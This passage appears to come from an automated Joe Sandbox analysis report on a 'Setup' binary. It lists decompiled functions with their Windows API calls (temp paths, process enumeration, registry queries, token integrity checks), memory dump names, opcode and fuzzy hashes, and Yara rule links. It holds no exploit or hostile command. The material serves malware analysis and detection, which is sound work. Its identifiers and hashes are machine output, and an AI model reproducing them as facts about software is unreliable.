                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,?,00000010,?,00000000,?,?,?,?,00000024,698DF18B,?), ref: 698F57AE
                                                                                                                                                                      • Part of subcall function 698DEFE2: Process32NextW.KERNEL32(00000000,0000022C), ref: 698DF04D
                                                                                                                                                                      • Part of subcall function 698DF0C8: __EH_prolog3.LIBCMT ref: 698DF0CF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3Process32$ChangeCloseCreateCurrentFindFirstNextNotificationPathProcessSnapshotTempToolhelp32__wcsicoll_memcpy_s_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4125857435-0
                                                                                                                                                                    • Opcode ID: dbcdd1cf38cacb220a6b770580bfa38c93f4484c6ab653eba4844b821539e63b
                                                                                                                                                                    • Instruction ID: 2c9a179f43e089e3b198c78f0a6297cdce13b1b9e3de259a77e2ddbed466fbc4
                                                                                                                                                                    • Opcode Fuzzy Hash: dbcdd1cf38cacb220a6b770580bfa38c93f4484c6ab653eba4844b821539e63b
                                                                                                                                                                    • Instruction Fuzzy Hash: 80916F75810208CFDB00DFBCC949BADBBB4EF15358F14AA5DE061A7291D7349909CBA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB988C Relevance: 4.6, APIs: 3, Instructions: 120COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB9893
                                                                                                                                                                    • GetCommandLineW.KERNEL32(0000002C,69DBD52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69DB98B4
                                                                                                                                                                      • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
                                                                                                                                                                      • Part of subcall function 69D74412: __EH_prolog3.LIBCMT ref: 69D74419
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D753D4: ExpandEnvironmentStringsW.KERNEL32(?,?,00000105,00000010,69DFEE70,?,?,?,?,69DB995C,00000000,?,UiInfo.xml,?,?,00000000), ref: 69D75412
                                                                                                                                                                      • Part of subcall function 69D753D4: ExpandEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,?,69DB995C,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 69D75440
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 69DB996E
                                                                                                                                                                      • Part of subcall function 69D75D3F: __EH_prolog3.LIBCMT ref: 69D75D46
                                                                                                                                                                      • Part of subcall function 69D75D3F: GetModuleFileNameW.KERNEL32(69D50000,00000010,00000104,?,69DA831D,00000000), ref: 69D75D93
                                                                                                                                                                      • Part of subcall function 69DA8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,69DB99FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 69DA8E6E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$EnvironmentExpandPathStrings$AppendCommandFileLineModuleNameRelative
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 168041992-0
                                                                                                                                                                    • Opcode ID: 06268527965744dc0b8702c84e6c6fa2176a9e7dce17232f83c0bd7a50e6acb7
                                                                                                                                                                    • Instruction ID: 5fb3031b53d46cc1b8525732cc22064d4e10aaf256becd1beba461675a61aa76
                                                                                                                                                                    • Opcode Fuzzy Hash: 06268527965744dc0b8702c84e6c6fa2176a9e7dce17232f83c0bd7a50e6acb7
                                                                                                                                                                    • Instruction Fuzzy Hash: 4C417D76900289DBDF11DBF8C844AEDBBB9BF05318F149265E020EB791CB78DA058772
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69A7182C Relevance: 4.6, APIs: 3, Instructions: 109registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(?,?,00000000,-00020018,69A72E5E,?,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 69A71897
                                                                                                                                                                    • RegQueryValueExW.KERNEL32(69A72E5E,?,00000000,00000027,80000002,?,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?), ref: 69A718B3
                                                                                                                                                                    • RegCloseKey.KERNEL32(69A72E5E,?,00000000,?,?,?,69A72E5E,80000002,Software\Microsoft\SQMClient,MachineId,?,00000027), ref: 69A718D1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207888905.0000000069A70000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208013345.0000000069A90000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208074023.0000000069A91000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                    • Opcode ID: b9c52ee2bd43915fd0844a3852cf38602c4d57a30cbf23224a51f6763cfcdcfc
                                                                                                                                                                    • Instruction ID: 6aeb296343db2d5dacefd7ae087b60b4cea2efc66e345ae709417fec5cb7b8e2
                                                                                                                                                                    • Opcode Fuzzy Hash: b9c52ee2bd43915fd0844a3852cf38602c4d57a30cbf23224a51f6763cfcdcfc
                                                                                                                                                                    • Instruction Fuzzy Hash: B131BD3A514395AFDB208F54C996EAA7BECBB11B84F1440A9FD11AF1A0D331CAC59B90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D790AA Relevance: 4.6, APIs: 3, Instructions: 77memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$AllocFreeH_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2967515224-0
                                                                                                                                                                    • Opcode ID: 08f1efb5e1c433d93b95b893e335f6add7155a38291f613c6f75cb6af7a706f5
                                                                                                                                                                    • Instruction ID: 56705f5b0ab83fe7be9f684eeee715682e648ffc95d41fd7943c49192346566d
                                                                                                                                                                    • Opcode Fuzzy Hash: 08f1efb5e1c433d93b95b893e335f6add7155a38291f613c6f75cb6af7a706f5
                                                                                                                                                                    • Instruction Fuzzy Hash: 5D314771A00249EFCF10DFA8C98899DBBB5BF09314F6085B8E965EF690C7319A45CB10
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698EF5FD Relevance: 4.6, APIs: 3, Instructions: 53COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __recalloc$H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 59120599-0
                                                                                                                                                                    • Opcode ID: 724f4f2f8bf5cff11656c41fb6896dfcf9b5d90d4be91329f4ca65f6a32441d5
                                                                                                                                                                    • Instruction ID: 3ef4229c7d5f3057f9e84eefe9e55001b350953418fb612e038e0540ab89b01f
                                                                                                                                                                    • Opcode Fuzzy Hash: 724f4f2f8bf5cff11656c41fb6896dfcf9b5d90d4be91329f4ca65f6a32441d5
                                                                                                                                                                    • Instruction Fuzzy Hash: 571109756002029FE710CF69D991B1AB7E5FB24754F109C2CE9EACB365EB31E8428B50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698EDF19 Relevance: 4.6, APIs: 3, Instructions: 50threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0001DFAB,?,00000000,00000000), ref: 698EDF5E
                                                                                                                                                                      • Part of subcall function 698F03F5: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00000064,000004FF), ref: 698F0415
                                                                                                                                                                      • Part of subcall function 698F03F5: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 698F042B
                                                                                                                                                                      • Part of subcall function 698F03F5: TranslateMessage.USER32(?), ref: 698F0435
                                                                                                                                                                      • Part of subcall function 698F03F5: DispatchMessageW.USER32(?), ref: 698F043F
                                                                                                                                                                      • Part of subcall function 698F03F5: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 698F044E
                                                                                                                                                                    • GetExitCodeThread.KERNEL32(00000000,000000FF), ref: 698EDF77
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 698EDF7E
                                                                                                                                                                      • Part of subcall function 698ECB21: __EH_prolog3.LIBCMT ref: 698ECB28
                                                                                                                                                                      • Part of subcall function 698ECB21: DestroyIcon.USER32(?,00000004), ref: 698ECB50
                                                                                                                                                                      • Part of subcall function 698ECB21: DestroyIcon.USER32(?,00000004), ref: 698ECB5D
                                                                                                                                                                      • Part of subcall function 698ECB21: DestroyIcon.USER32(?,00000004), ref: 698ECB6A
                                                                                                                                                                      • Part of subcall function 698ECB21: DestroyIcon.USER32(?,00000004), ref: 698ECB77
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DestroyIconMessage$PeekThread$CloseCodeCreateDispatchExitH_prolog3HandleMultipleObjectsTranslateWait
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1402139836-0
                                                                                                                                                                    • Opcode ID: d8f38af1225a17b54db2bbee0bb8400ce19543234b33c5f12aa6d3e4cfba9410
                                                                                                                                                                    • Instruction ID: 2f5b623368e0de410206a68fbf9aa14caa13ab749797f72b9b506a11c4100080
                                                                                                                                                                    • Opcode Fuzzy Hash: d8f38af1225a17b54db2bbee0bb8400ce19543234b33c5f12aa6d3e4cfba9410
                                                                                                                                                                    • Instruction Fuzzy Hash: 71016176504204AFCB04DF64DC08CABBBA9EF85224F00CA1DF865DB150D731D91ACBE2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DBCC2C Relevance: 4.5, APIs: 3, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __recalloc$H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 59120599-0
                                                                                                                                                                    • Opcode ID: e9ff190cf8314778615c3ca2f78e252f1967bf5858aec950105d954de04b4c78
                                                                                                                                                                    • Instruction ID: 692d3aacf019a1e40c9832f34e98f7d1ae3755e0d3a9b188a7459748be979f8a
                                                                                                                                                                    • Opcode Fuzzy Hash: e9ff190cf8314778615c3ca2f78e252f1967bf5858aec950105d954de04b4c78
                                                                                                                                                                    • Instruction Fuzzy Hash: DC0129B5640602DFEB10DF68C941B6677E4FB24604F109838DAA6CBB54D730E805CB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69A72815 Relevance: 4.5, APIs: 3, Instructions: 47COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,69A7332F(TokenIntegrityLevel),00000000,00000000,00000000,00000000,00000000,?,?,69A736C7,?,00000001), ref: 69A72835
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,69A736C7,?,00000001,?,?,?,?,69A7332F,?), ref: 69A7283B
                                                                                                                                                                      • Part of subcall function 69A71967: malloc.MSVCRT(?,69A90554), ref: 69A71979
                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,69A7332F(TokenIntegrityLevel),00000000,00000000,00000000,?,?,69A736C7,?,00000001,?,?,?,?,69A7332F,?), ref: 69A72863
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207888905.0000000069A70000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208013345.0000000069A90000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208074023.0000000069A91000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InformationToken$ErrorLastmalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3066823155-0
                                                                                                                                                                    • Opcode ID: abbbfafdcacbef2d2a0f0ee19271108d31f1ab6a727dd25ac03cea3a7041ddbe
                                                                                                                                                                    • Instruction ID: 0c4c6ef88d6d82ed59011c718d64fb66d7a9d7d95a9b46da9030eeac14dbdedc
                                                                                                                                                                    • Opcode Fuzzy Hash: abbbfafdcacbef2d2a0f0ee19271108d31f1ab6a727dd25ac03cea3a7041ddbe
                                                                                                                                                                    • Instruction Fuzzy Hash: 1E016239544309BEEF119E949D43FAA7BEDEB05B99F104021FD00AA150D732DE42A760
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D7C406 Relevance: 4.5, APIs: 3, Instructions: 40registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,?,?,?,?,?,69DB35F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 69D7C426
                                                                                                                                                                    • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,69DB0F4A,00000004,?,?,?,69DB35F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 69D7C43F
                                                                                                                                                                    • RegCloseKey.KERNEL32(?,?,?,?,69DB35F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType,?,02602230,00000004,69DB0F4A,?), ref: 69D7C44E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                    • Opcode ID: cd2fe6747988c85191029d428c78ba9fa7a3be75c87664646174d5e8646fad6d
                                                                                                                                                                    • Instruction ID: 98a793de663d44aeb29ac85002238d5602e2eca62b26c5cef08f442681bbf6a0
                                                                                                                                                                    • Opcode Fuzzy Hash: cd2fe6747988c85191029d428c78ba9fa7a3be75c87664646174d5e8646fad6d
                                                                                                                                                                    • Instruction Fuzzy Hash: 7CF0EC76100148FFEF11CFA8CD86EAE7B6DEF053A9F108125F91196294D771DE509B21
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D77CE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D77CEF
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D77EE4: __EH_prolog3.LIBCMT ref: 69D77EEB
                                                                                                                                                                      • Part of subcall function 69D75DD0: __EH_prolog3.LIBCMT ref: 69D75DD7
                                                                                                                                                                      • Part of subcall function 69D75485: __EH_prolog3.LIBCMT ref: 69D7548C
                                                                                                                                                                      • Part of subcall function 69D75485: GetModuleHandleW.KERNEL32(kernel32.dll,0000002C,69D77DAF,?,?,?,?,?,00000000,?,?,69D6AB18,00000008,69D77CD9), ref: 69D7549C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$HandleModule
                                                                                                                                                                    • String ID: Unknown
                                                                                                                                                                    • API String ID: 1530205010-1654365787
                                                                                                                                                                    • Opcode ID: fb0e2f912b60771ad3de33bc71f2504227eba511f2be83137ba7e0bb449fd3e2
                                                                                                                                                                    • Instruction ID: 0df508ff334571aa5052841e3bf33776f8784e37202431fe92c2bf0e21369405
                                                                                                                                                                    • Opcode Fuzzy Hash: fb0e2f912b60771ad3de33bc71f2504227eba511f2be83137ba7e0bb449fd3e2
                                                                                                                                                                    • Instruction Fuzzy Hash: C4317075510705DAD724DFB4C841BAFB3A8BF05314F509E2DA17ADBAC0DB70A9088766
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D82811 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D82818
                                                                                                                                                                      • Part of subcall function 69DCC0AA: _malloc.LIBCMT ref: 69DCC0C4
                                                                                                                                                                      • Part of subcall function 69D81EBF: __EH_prolog3.LIBCMT ref: 69D81EC6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$_malloc
                                                                                                                                                                    • String ID: BlockIfGroup
                                                                                                                                                                    • API String ID: 1683881009-1356723647
                                                                                                                                                                    • Opcode ID: 5808e08cd3cb3716319003159b0d9d00f8bd2217e48e357daed3a37768e5653e
                                                                                                                                                                    • Instruction ID: b4a4d65ff97ba99e9faedf7b0e821c81c7aa2f9de47dc8f531938b61c641440f
                                                                                                                                                                    • Opcode Fuzzy Hash: 5808e08cd3cb3716319003159b0d9d00f8bd2217e48e357daed3a37768e5653e
                                                                                                                                                                    • Instruction Fuzzy Hash: 3431427490020AEBDF00DFB8CA85B9E7BB8AF05358F108475E614EB681D734DA069B71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F54B3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: %TEMP%
                                                                                                                                                                    • API String ID: 431132790-235365282
                                                                                                                                                                    • Opcode ID: 5f35a802de991a6b56b8cb1c84190566d75d7b43b588a91c458dfaec7fa7e445
                                                                                                                                                                    • Instruction ID: 0ecc6d739871c6ab06df7d625d40c17ab01e9593ec57d9b36bdf6232a62ab39a
                                                                                                                                                                    • Opcode Fuzzy Hash: 5f35a802de991a6b56b8cb1c84190566d75d7b43b588a91c458dfaec7fa7e445
                                                                                                                                                                    • Instruction Fuzzy Hash: 45212F75900219EBDF00DF65CC889AE7B75FF58355F009919F9269B250D730DA16CB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA4AD6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DA4ADD
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69DA8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,69DB99FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 69DA8E6E
